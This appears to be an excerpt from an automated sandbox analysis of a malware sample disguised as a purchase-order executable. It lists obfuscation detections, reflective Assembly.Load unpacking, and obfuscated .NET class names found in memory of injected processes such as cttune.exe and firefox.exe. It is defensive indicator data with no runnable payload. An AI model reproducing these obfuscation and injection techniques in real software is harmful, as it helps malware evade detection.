                Source: Binary string: System.Windows.Forms.ni.pdb source: PO 1202495088.exe, 00000001.00000002.1121146600.00000000708AB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO 1202495088.exe, 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1466694539.00000000047E5000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1462966186.0000000004631000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: wntdll.pdb source: PO 1202495088.exe, PO 1202495088.exe, 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, cttune.exe, 0000000D.00000003.1466694539.00000000047E5000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1462966186.0000000004631000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdbRSDS source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: PO 1202495088.exe, ServerForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 1.2.PO 1202495088.exe.4324028.4.raw.unpack, MainForm.cs.Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, mK0wZ1QMebWlE3QgK5.cs.Net Code: yeuX8ln8Uy System.Reflection.Assembly.Load(byte[])
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, mK0wZ1QMebWlE3QgK5.cs.Net Code: yeuX8ln8Uy System.Reflection.Assembly.Load(byte[])
                Source: 1.2.PO 1202495088.exe.4344048.1.raw.unpack, MainForm.cs.Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, mK0wZ1QMebWlE3QgK5.cs.Net Code: yeuX8ln8Uy System.Reflection.Assembly.Load(byte[])
                Source: 12.2.RAVCpl64.exe.730cd14.0.raw.unpack, ServerForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 13.2.cttune.exe.505cd14.2.raw.unpack, ServerForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 14.2.firefox.exe.3300cd14.0.raw.unpack, ServerForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_075F6D4C push esp; retn 0754h1_2_075F6DB9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_075F6CA8 push eax; iretd 1_2_075F6CA9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_004178CA push edx; iretd 4_2_004178CD
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_004150EB push esp; iretd 4_2_0041514F
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0040D8B6 push ecx; ret 4_2_0040D8B7
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_00415119 push esp; iretd 4_2_0041514F
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_00424A53 push 3D550B4Fh; ret 4_2_00424A6B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_00417A3B push ebx; iretd 4_2_00417A3C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_00423D13 push edi; retf 4_2_00423D1E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0040AEDA push FFFFFF84h; retf 4_2_0040AEDC
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_004036A0 push eax; ret 4_2_004036A2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B08CD push ecx; mov dword ptr [esp], ecx4_2_013B08D6
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 12_2_006A0064 push cs; retf 12_2_006A0065
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 12_2_006AA8C8 push ebx; iretd 12_2_006AA902
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 12_2_006A117B push cs; retf 12_2_006A1182
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 12_2_006AAD1D push es; iretd 12_2_006AAD1E
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 12_2_006AFEE2 push eax; ret 12_2_006AFEE4
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 12_2_006A23E2 push edx; ret 12_2_006A23E3
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 12_2_006A9F9C push cs; retf 12_2_006A9F9D
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049C08CD push ecx; mov dword ptr [esp], ecx13_2_049C08D6
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CE5064 push cs; retf 13_2_04CE5065
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CE617B push cs; retf 13_2_04CE6182
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CE73E2 push edx; ret 13_2_04CE73E3
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEFD1D push es; iretd 13_2_04CEFD1E
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF4EE2 push eax; ret 13_2_04CF4EE4
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEF8C2 push ebx; iretd 13_2_04CEF902
                Source: PO 1202495088.exeStatic PE information: section name: .text entropy: 7.712943967967854
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, HdFCn7AXQf15ObaaY8.csHigh entropy of concatenated method names: 'WJMIBsTot8', 'otKIJUbo68', 'v2qIINXUgF', 'iToIVJW3D2', 'LKwIsklnNc', 'o63IG645lL', 'Dispose', 'tIZhvmoEnH', 'HRVhbFEJhX', 'whFhTiBHUq'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, PxL28V9OxE8r41cBZU.csHigh entropy of concatenated method names: 'iM2HTm9AP4', 'DCEHn2EOVX', 'JrCHxNh3t9', 'v3sHW2hJYx', 'lirHIwR99N', 'ItJHQvBwPL', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, b6h94FXIghc9d5DLCT.csHigh entropy of concatenated method names: 'Tnr5WUjTua', 'cHv5QFULjn', 'zVR57AuD1X', 'mxg5CuFNCJ', 'fEb5BmMPXF', 'hgh5SVeGHG', 'YhlFGX7qU4t4IqnHys', 'GdJgHZ6YHh6Zdahj8D', 'h2A55GT4Ie', 'Hb65UCgf6h'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, cDmf4BMyGvApCfOKj9.csHigh entropy of concatenated method names: 'nkuIg5rcyN', 'A3BIDaIHwO', 'TrUIZVr35r', 'VgqIYU8NG2', 'FxOIjeTvyH', 'rTXIKQtLSe', 'jqPI6AuFG6', 'yBBI3kYvhI', 'zaPIftLUF1', 'pnNI1GsFmb'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, nXFnghgVeGHGdgYcqW.csHigh entropy of concatenated method names: 'HpAxNpygtZ', 'zQNxbcjEhW', 'cLnxnQWbX0', 'mNsxWdJUh5', 'cpMxQLimlL', 'kD4n2kKXnb', 'vpOnqQhG9l', 'QMvnAZRpWG', 'cymnuOxxB5', 'CIGnMh8x6n'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, IUrGUY6io51EZYGAZ7.csHigh entropy of concatenated method names: 'XHJWvUaAiD', 'JDrWTIrYBW', 'DNhWxHiAcL', 'SBAx9a3q47', 'h91xzf7Eov', 'jSJWafGIWe', 'XbSW5xCFm4', 'EeWWpQHON8', 'hU0WUcASUC', 'yxOWXF7Ckc'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, rX8yfdzNTOVA7xoqVi.csHigh entropy of concatenated method names: 'aA7Hl8E4LM', 'DQpHExq9Xh', 'IR6Htd0dje', 'XBCHgiOpUB', 'oNpHDoNBpE', 'BkUHYpkMm9', 'KMwHju6k4m', 'xabHGPhE5r', 'Gt9HOjaMMH', 'gK7H4tPodd'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, xta7UEqSKx5JHuevPE.csHigh entropy of concatenated method names: 'zyoJuT0MYp', 'sEuJ9cRTOe', 'EIChayE65W', 'cNPh5ts8Pf', 'XL0JyPaCOd', 'h15JiXEPm3', 'qvmJo6eWHN', 'TbfJc6mW6K', 'JitJkER3gx', 'cynJmw4JH4'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, u55hdemhyodOW6Zp76.csHigh entropy of concatenated method names: 'ToString', 'BdTSyVvUtW', 'MHtSDZmIfu', 'BE5SZE5JED', 'LS4SYdTk5w', 'E8nSjlvc7X', 'WG6SKxQVLA', 'nyQS6MFFOV', 'OqjS3efxj4', 'UXiSf41ReP'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, PSiLU8tVRAuD1X7xgu.csHigh entropy of concatenated method names: 'cLNTRM7rfT', 'yP6TlXM0t6', 'jKDTEOJpQP', 'qK5TtWNYV7', 'hGgTBQKbdr', 'Jx6TSlmxmb', 'dEBTJxKZm0', 'TsnThexlBT', 'lFrTIBkkWu', 'NAaTHdeEfe'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, h0glaQcAaJPbe5OWvY.csHigh entropy of concatenated method names: 'fajB1cgVkT', 'jsGBivEJp1', 'OA4Bcttfo0', 'DZnBka1OnU', 'jRQBDL6JoL', 'TBYBZSdgSJ', 'KeQBYvnhrx', 'yLaBjCuLYd', 's5LBKBNmYF', 'dFrB6yjWdm'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, i0S4Wf55fSYhQhLvftS.csHigh entropy of concatenated method names: 'ICIH9INeqC', 'DelHzxvOHm', 'RogVaTxbpX', 'SjqV54tBL1', 'cOMVpMathu', 'WdTVU7ALna', 'zpHVXITjWR', 'TXaVNNnObL', 'aKAVvvQ9DJ', 'dc7VbFWfES'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, OolqYAbysusZjsMC55.csHigh entropy of concatenated method names: 'Dispose', 'M155MObaaY', 'tiGpDsTOlE', 'BlDcKtDjPB', 'zB559CKVtI', 'ENG5zx4eDd', 'ProcessDialogKey', 'PxUpaDmf4B', 'OGvp5ApCfO', 'Kj9ppoxL28'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, mK0wZ1QMebWlE3QgK5.csHigh entropy of concatenated method names: 'mU6UN23GXr', 'nn3UvZEnBf', 'Vj5UbYbpGi', 'wACUTp03M8', 'XmfUnLvlKa', 'TZpUxEISZP', 'UOEUWcrX5r', 'qxNUQMWDKN', 'bWsUFIw5Ub', 'LMuU7mSjHn'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, uUjTuaEUHvFULjn8cB.csHigh entropy of concatenated method names: 'ob5bcEeegd', 'tQfbkuRmHZ', 'EFmbm4CKeL', 'kPsbLOMMxx', 'bcNb2wd6MH', 'aRhbqpcnVv', 'qf4bA8Tf8a', 'K4wbuo2wl9', 'h0ObMMid3G', 'IdPb9jmqbD'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, DVXfhs5XQlcE3viVe4G.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ktlrIFRyUS', 'i5qrHWlctW', 'ejerVle72e', 'kqIrrDF1wZ', 'ymIrswEIQx', 'KAIreUquMG', 'pmgrGSXgxl'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, Lb30oD5NZSl2idqgsue.csHigh entropy of concatenated method names: 'luPgP9ZZfyjpF', 'b6jUrfl3q8wOKhB4PvU', 'W3iHfPlEPqNQY56Ny0V', 'I1DPWtlPkGRCOewOeqJ', 'y0MIablYwGaEsD2lYNS', 'zdhffAlUkT8BmOcR0uA'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, XOlZVOoLm4JP3UJtnJ.csHigh entropy of concatenated method names: 'WO9PE0tTyS', 'X6TPt6VnVV', 'riyPgxIuTw', 'DNMPDPCKB7', 'H8vPYR9AF5', 'fg1PjS1S4Z', 'LMeP6ufuoM', 'TJ8P3rJOVs', 'tRlP1hMdrv', 'XgXPyu5ZnA'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, k5BBnjfuXoDcUptWYL.csHigh entropy of concatenated method names: 's0ZWOyxtWL', 'JgZW4rqEUw', 'M9CW8yt5xl', 'tB3WRI4mbm', 'dOrWdrC8WN', 'G2DWlGkD25', 'yJYWw0Pk2S', 'FaeWEX4Ktk', 'k8kWtyWUr7', 'Pj2W0nTkcJ'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, W1hFvapKrUm5wvGUxP.csHigh entropy of concatenated method names: 'QwJ8uAZGf', 'GMARiD7j1', 'iFNlAKRf6', 'ahCwjNNCI', 'TI2t5jfJN', 'lPb0y8goK', 'vrlTS2XIC6XBEx4UaU', 'caJKBmAV0BnIQ3ohOv', 'TZbhdeaGB', 'foLH4tKH8'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, HNmpxA5pVuEotTu6A3N.csHigh entropy of concatenated method names: 'ToString', 'JINVEhuo5m', 'Mn9VtpaOgm', 'ORvV072ZZX', 'MXNVgpK5PA', 'RkHVDH4jBU', 'WpyVZCkZvp', 'CKEVYo3bhU', 'nrA5fSnIMHeyraRP6sd', 'eURcqgnGMG8CoFO3vj0'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, HdFCn7AXQf15ObaaY8.csHigh entropy of concatenated method names: 'WJMIBsTot8', 'otKIJUbo68', 'v2qIINXUgF', 'iToIVJW3D2', 'LKwIsklnNc', 'o63IG645lL', 'Dispose', 'tIZhvmoEnH', 'HRVhbFEJhX', 'whFhTiBHUq'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, PxL28V9OxE8r41cBZU.csHigh entropy of concatenated method names: 'iM2HTm9AP4', 'DCEHn2EOVX', 'JrCHxNh3t9', 'v3sHW2hJYx', 'lirHIwR99N', 'ItJHQvBwPL', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, b6h94FXIghc9d5DLCT.csHigh entropy of concatenated method names: 'Tnr5WUjTua', 'cHv5QFULjn', 'zVR57AuD1X', 'mxg5CuFNCJ', 'fEb5BmMPXF', 'hgh5SVeGHG', 'YhlFGX7qU4t4IqnHys', 'GdJgHZ6YHh6Zdahj8D', 'h2A55GT4Ie', 'Hb65UCgf6h'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, cDmf4BMyGvApCfOKj9.csHigh entropy of concatenated method names: 'nkuIg5rcyN', 'A3BIDaIHwO', 'TrUIZVr35r', 'VgqIYU8NG2', 'FxOIjeTvyH', 'rTXIKQtLSe', 'jqPI6AuFG6', 'yBBI3kYvhI', 'zaPIftLUF1', 'pnNI1GsFmb'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, nXFnghgVeGHGdgYcqW.csHigh entropy of concatenated method names: 'HpAxNpygtZ', 'zQNxbcjEhW', 'cLnxnQWbX0', 'mNsxWdJUh5', 'cpMxQLimlL', 'kD4n2kKXnb', 'vpOnqQhG9l', 'QMvnAZRpWG', 'cymnuOxxB5', 'CIGnMh8x6n'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, IUrGUY6io51EZYGAZ7.csHigh entropy of concatenated method names: 'XHJWvUaAiD', 'JDrWTIrYBW', 'DNhWxHiAcL', 'SBAx9a3q47', 'h91xzf7Eov', 'jSJWafGIWe', 'XbSW5xCFm4', 'EeWWpQHON8', 'hU0WUcASUC', 'yxOWXF7Ckc'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, rX8yfdzNTOVA7xoqVi.csHigh entropy of concatenated method names: 'aA7Hl8E4LM', 'DQpHExq9Xh', 'IR6Htd0dje', 'XBCHgiOpUB', 'oNpHDoNBpE', 'BkUHYpkMm9', 'KMwHju6k4m', 'xabHGPhE5r', 'Gt9HOjaMMH', 'gK7H4tPodd'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, xta7UEqSKx5JHuevPE.csHigh entropy of concatenated method names: 'zyoJuT0MYp', 'sEuJ9cRTOe', 'EIChayE65W', 'cNPh5ts8Pf', 'XL0JyPaCOd', 'h15JiXEPm3', 'qvmJo6eWHN', 'TbfJc6mW6K', 'JitJkER3gx', 'cynJmw4JH4'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, u55hdemhyodOW6Zp76.csHigh entropy of concatenated method names: 'ToString', 'BdTSyVvUtW', 'MHtSDZmIfu', 'BE5SZE5JED', 'LS4SYdTk5w', 'E8nSjlvc7X', 'WG6SKxQVLA', 'nyQS6MFFOV', 'OqjS3efxj4', 'UXiSf41ReP'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, PSiLU8tVRAuD1X7xgu.csHigh entropy of concatenated method names: 'cLNTRM7rfT', 'yP6TlXM0t6', 'jKDTEOJpQP', 'qK5TtWNYV7', 'hGgTBQKbdr', 'Jx6TSlmxmb', 'dEBTJxKZm0', 'TsnThexlBT', 'lFrTIBkkWu', 'NAaTHdeEfe'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, h0glaQcAaJPbe5OWvY.csHigh entropy of concatenated method names: 'fajB1cgVkT', 'jsGBivEJp1', 'OA4Bcttfo0', 'DZnBka1OnU', 'jRQBDL6JoL', 'TBYBZSdgSJ', 'KeQBYvnhrx', 'yLaBjCuLYd', 's5LBKBNmYF', 'dFrB6yjWdm'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, i0S4Wf55fSYhQhLvftS.csHigh entropy of concatenated method names: 'ICIH9INeqC', 'DelHzxvOHm', 'RogVaTxbpX', 'SjqV54tBL1', 'cOMVpMathu', 'WdTVU7ALna', 'zpHVXITjWR', 'TXaVNNnObL', 'aKAVvvQ9DJ', 'dc7VbFWfES'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, OolqYAbysusZjsMC55.csHigh entropy of concatenated method names: 'Dispose', 'M155MObaaY', 'tiGpDsTOlE', 'BlDcKtDjPB', 'zB559CKVtI', 'ENG5zx4eDd', 'ProcessDialogKey', 'PxUpaDmf4B', 'OGvp5ApCfO', 'Kj9ppoxL28'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, mK0wZ1QMebWlE3QgK5.csHigh entropy of concatenated method names: 'mU6UN23GXr', 'nn3UvZEnBf', 'Vj5UbYbpGi', 'wACUTp03M8', 'XmfUnLvlKa', 'TZpUxEISZP', 'UOEUWcrX5r', 'qxNUQMWDKN', 'bWsUFIw5Ub', 'LMuU7mSjHn'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, uUjTuaEUHvFULjn8cB.csHigh entropy of concatenated method names: 'ob5bcEeegd', 'tQfbkuRmHZ', 'EFmbm4CKeL', 'kPsbLOMMxx', 'bcNb2wd6MH', 'aRhbqpcnVv', 'qf4bA8Tf8a', 'K4wbuo2wl9', 'h0ObMMid3G', 'IdPb9jmqbD'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, DVXfhs5XQlcE3viVe4G.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ktlrIFRyUS', 'i5qrHWlctW', 'ejerVle72e', 'kqIrrDF1wZ', 'ymIrswEIQx', 'KAIreUquMG', 'pmgrGSXgxl'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, Lb30oD5NZSl2idqgsue.csHigh entropy of concatenated method names: 'luPgP9ZZfyjpF', 'b6jUrfl3q8wOKhB4PvU', 'W3iHfPlEPqNQY56Ny0V', 'I1DPWtlPkGRCOewOeqJ', 'y0MIablYwGaEsD2lYNS', 'zdhffAlUkT8BmOcR0uA'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, XOlZVOoLm4JP3UJtnJ.csHigh entropy of concatenated method names: 'WO9PE0tTyS', 'X6TPt6VnVV', 'riyPgxIuTw', 'DNMPDPCKB7', 'H8vPYR9AF5', 'fg1PjS1S4Z', 'LMeP6ufuoM', 'TJ8P3rJOVs', 'tRlP1hMdrv', 'XgXPyu5ZnA'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, k5BBnjfuXoDcUptWYL.csHigh entropy of concatenated method names: 's0ZWOyxtWL', 'JgZW4rqEUw', 'M9CW8yt5xl', 'tB3WRI4mbm', 'dOrWdrC8WN', 'G2DWlGkD25', 'yJYWw0Pk2S', 'FaeWEX4Ktk', 'k8kWtyWUr7', 'Pj2W0nTkcJ'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, W1hFvapKrUm5wvGUxP.csHigh entropy of concatenated method names: 'QwJ8uAZGf', 'GMARiD7j1', 'iFNlAKRf6', 'ahCwjNNCI', 'TI2t5jfJN', 'lPb0y8goK', 'vrlTS2XIC6XBEx4UaU', 'caJKBmAV0BnIQ3ohOv', 'TZbhdeaGB', 'foLH4tKH8'
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, HNmpxA5pVuEotTu6A3N.csHigh entropy of concatenated method names: 'ToString', 'JINVEhuo5m', 'Mn9VtpaOgm', 'ORvV072ZZX', 'MXNVgpK5PA', 'RkHVDH4jBU', 'WpyVZCkZvp', 'CKEVYo3bhU', 'nrA5fSnIMHeyraRP6sd', 'eURcqgnGMG8CoFO3vj0'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, HdFCn7AXQf15ObaaY8.csHigh entropy of concatenated method names: 'WJMIBsTot8', 'otKIJUbo68', 'v2qIINXUgF', 'iToIVJW3D2', 'LKwIsklnNc', 'o63IG645lL', 'Dispose', 'tIZhvmoEnH', 'HRVhbFEJhX', 'whFhTiBHUq'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, PxL28V9OxE8r41cBZU.csHigh entropy of concatenated method names: 'iM2HTm9AP4', 'DCEHn2EOVX', 'JrCHxNh3t9', 'v3sHW2hJYx', 'lirHIwR99N', 'ItJHQvBwPL', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, b6h94FXIghc9d5DLCT.csHigh entropy of concatenated method names: 'Tnr5WUjTua', 'cHv5QFULjn', 'zVR57AuD1X', 'mxg5CuFNCJ', 'fEb5BmMPXF', 'hgh5SVeGHG', 'YhlFGX7qU4t4IqnHys', 'GdJgHZ6YHh6Zdahj8D', 'h2A55GT4Ie', 'Hb65UCgf6h'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, cDmf4BMyGvApCfOKj9.csHigh entropy of concatenated method names: 'nkuIg5rcyN', 'A3BIDaIHwO', 'TrUIZVr35r', 'VgqIYU8NG2', 'FxOIjeTvyH', 'rTXIKQtLSe', 'jqPI6AuFG6', 'yBBI3kYvhI', 'zaPIftLUF1', 'pnNI1GsFmb'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, nXFnghgVeGHGdgYcqW.csHigh entropy of concatenated method names: 'HpAxNpygtZ', 'zQNxbcjEhW', 'cLnxnQWbX0', 'mNsxWdJUh5', 'cpMxQLimlL', 'kD4n2kKXnb', 'vpOnqQhG9l', 'QMvnAZRpWG', 'cymnuOxxB5', 'CIGnMh8x6n'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, IUrGUY6io51EZYGAZ7.csHigh entropy of concatenated method names: 'XHJWvUaAiD', 'JDrWTIrYBW', 'DNhWxHiAcL', 'SBAx9a3q47', 'h91xzf7Eov', 'jSJWafGIWe', 'XbSW5xCFm4', 'EeWWpQHON8', 'hU0WUcASUC', 'yxOWXF7Ckc'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, rX8yfdzNTOVA7xoqVi.csHigh entropy of concatenated method names: 'aA7Hl8E4LM', 'DQpHExq9Xh', 'IR6Htd0dje', 'XBCHgiOpUB', 'oNpHDoNBpE', 'BkUHYpkMm9', 'KMwHju6k4m', 'xabHGPhE5r', 'Gt9HOjaMMH', 'gK7H4tPodd'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, xta7UEqSKx5JHuevPE.csHigh entropy of concatenated method names: 'zyoJuT0MYp', 'sEuJ9cRTOe', 'EIChayE65W', 'cNPh5ts8Pf', 'XL0JyPaCOd', 'h15JiXEPm3', 'qvmJo6eWHN', 'TbfJc6mW6K', 'JitJkER3gx', 'cynJmw4JH4'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, u55hdemhyodOW6Zp76.csHigh entropy of concatenated method names: 'ToString', 'BdTSyVvUtW', 'MHtSDZmIfu', 'BE5SZE5JED', 'LS4SYdTk5w', 'E8nSjlvc7X', 'WG6SKxQVLA', 'nyQS6MFFOV', 'OqjS3efxj4', 'UXiSf41ReP'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, PSiLU8tVRAuD1X7xgu.csHigh entropy of concatenated method names: 'cLNTRM7rfT', 'yP6TlXM0t6', 'jKDTEOJpQP', 'qK5TtWNYV7', 'hGgTBQKbdr', 'Jx6TSlmxmb', 'dEBTJxKZm0', 'TsnThexlBT', 'lFrTIBkkWu', 'NAaTHdeEfe'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, h0glaQcAaJPbe5OWvY.csHigh entropy of concatenated method names: 'fajB1cgVkT', 'jsGBivEJp1', 'OA4Bcttfo0', 'DZnBka1OnU', 'jRQBDL6JoL', 'TBYBZSdgSJ', 'KeQBYvnhrx', 'yLaBjCuLYd', 's5LBKBNmYF', 'dFrB6yjWdm'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, i0S4Wf55fSYhQhLvftS.csHigh entropy of concatenated method names: 'ICIH9INeqC', 'DelHzxvOHm', 'RogVaTxbpX', 'SjqV54tBL1', 'cOMVpMathu', 'WdTVU7ALna', 'zpHVXITjWR', 'TXaVNNnObL', 'aKAVvvQ9DJ', 'dc7VbFWfES'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, OolqYAbysusZjsMC55.csHigh entropy of concatenated method names: 'Dispose', 'M155MObaaY', 'tiGpDsTOlE', 'BlDcKtDjPB', 'zB559CKVtI', 'ENG5zx4eDd', 'ProcessDialogKey', 'PxUpaDmf4B', 'OGvp5ApCfO', 'Kj9ppoxL28'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, mK0wZ1QMebWlE3QgK5.csHigh entropy of concatenated method names: 'mU6UN23GXr', 'nn3UvZEnBf', 'Vj5UbYbpGi', 'wACUTp03M8', 'XmfUnLvlKa', 'TZpUxEISZP', 'UOEUWcrX5r', 'qxNUQMWDKN', 'bWsUFIw5Ub', 'LMuU7mSjHn'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, uUjTuaEUHvFULjn8cB.csHigh entropy of concatenated method names: 'ob5bcEeegd', 'tQfbkuRmHZ', 'EFmbm4CKeL', 'kPsbLOMMxx', 'bcNb2wd6MH', 'aRhbqpcnVv', 'qf4bA8Tf8a', 'K4wbuo2wl9', 'h0ObMMid3G', 'IdPb9jmqbD'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, DVXfhs5XQlcE3viVe4G.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ktlrIFRyUS', 'i5qrHWlctW', 'ejerVle72e', 'kqIrrDF1wZ', 'ymIrswEIQx', 'KAIreUquMG', 'pmgrGSXgxl'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, Lb30oD5NZSl2idqgsue.csHigh entropy of concatenated method names: 'luPgP9ZZfyjpF', 'b6jUrfl3q8wOKhB4PvU', 'W3iHfPlEPqNQY56Ny0V', 'I1DPWtlPkGRCOewOeqJ', 'y0MIablYwGaEsD2lYNS', 'zdhffAlUkT8BmOcR0uA'
